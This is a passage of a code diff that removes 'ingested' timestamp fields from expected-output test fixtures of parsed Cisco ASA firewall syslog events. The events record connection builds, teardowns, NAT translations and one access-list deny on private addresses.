inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7663,7 +7568,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.009155857Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7744,7 +7648,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009156820Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", @@ -7823,7 +7726,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009157802Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", @@ -7906,7 +7808,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009158805Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", @@ -7985,7 +7886,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009159785Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8070,7 +7970,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009160752Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", @@ -8153,7 +8052,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009161719Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8238,7 +8136,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009162685Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", @@ -8320,7 +8217,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009163732Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", @@ -8399,7 +8295,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009164710Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", @@ -8482,7 +8377,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009165687Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", @@ -8561,7 +8455,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009166681Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", @@ -8647,7 +8540,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009167649Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", @@ -8729,7 +8621,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009168610Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", @@ -8808,7 +8699,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009169680Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", @@ -8894,7 +8784,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009170885Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", @@ -8976,7 +8865,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009171865Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", @@ -9055,7 +8943,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009172830Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", @@ -9141,7 +9028,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009173809Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", @@ -9226,7 +9112,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009174776Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", @@ -9308,7 +9193,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009175769Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", @@ -9387,7 +9271,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009176831Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", @@ -9473,7 +9356,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009177831Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", @@ -9555,7 +9437,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009178873Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", @@ -9634,7 +9515,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009179847Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", @@ -9717,7 +9597,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009180814Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", @@ -9796,7 +9675,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009181787Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", @@ -9879,7 +9757,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009182774Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", @@ -9958,7 +9835,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009183840Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", @@ -10041,7 +9917,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009184811Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", @@ -10120,7 +9995,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009185779Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", @@ -10206,7 +10080,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009186756Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", @@ -10291,7 +10164,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009187737Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", @@ -10376,7 +10248,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009188720Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", @@ -10458,7 +10329,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009189932Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", @@ -10537,7 +10407,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009190956Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", @@ -10620,7 +10489,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009191931Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", @@ -10699,7 +10567,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009192909Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", @@ -10785,7 +10652,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009193961Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", @@ -10867,7 +10733,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009195009Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", @@ -10946,7 +10811,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009195969Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", @@ -11032,7 +10896,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009196952Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", @@ -11117,7 +10980,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009197918Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", @@ -11200,7 +11062,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009198909Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11283,7 +11144,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009199958Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", @@ -11362,7 +11222,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009200939Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", @@ -11447,7 +11306,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009201904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", @@ -11530,7 +11388,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009202866Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11615,7 +11472,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009203848Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", @@ -11697,7 +11553,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009204818Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", @@ -11776,7 +11631,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009206036Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", @@ -11862,7 +11716,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009207008Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", @@ -11947,7 +11800,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009207993Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", @@ -12030,7 +11882,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009208987Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12115,7 +11966,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009209956Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -12197,7 +12047,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009210994Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", @@ -12276,7 +12125,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009211966Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", @@ -12361,7 +12209,6 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-12-29T09:58:07.009212938Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", @@ -12412,7 +12259,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009213912Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", @@ -12491,7 +12337,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009214886Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12575,7 +12420,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009215893Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12660,7 +12504,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009216902Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", @@ -12743,7 +12586,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009217874Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12828,7 +12670,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009218874Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", @@ -12912,7 +12753,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009219850Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -12995,7 +12835,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009220901Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13080,7 +12919,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009223512Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", @@ -13162,7 +13000,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009224679Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", @@ -13241,7 +13078,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009225651Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", @@ -13325,7 +13161,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009226843Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13410,7 +13245,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:07.009227829Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", @@ -13492,7 +13326,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009228809Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", @@ -13571,7 +13404,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009229789Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", @@ -13654,7 +13486,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009230773Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", @@ -13733,7 +13564,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009231774Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", @@ -13816,7 +13646,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009232815Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", @@ -13895,7 +13724,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009233773Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", @@ -13981,7 +13809,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.009234735Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", @@ -14063,7 +13890,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009235696Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", @@ -14142,7 +13968,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009236663Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", @@ -14225,7 +14050,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009237633Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", @@ -14304,7 +14128,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029403773Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", @@ -14390,7 +14213,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.029414542Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", @@ -14475,7 +14297,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.029416169Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", @@ -14560,7 +14381,6 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-29T09:58:07.029417189Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", @@ -14642,7 +14462,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029418175Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to 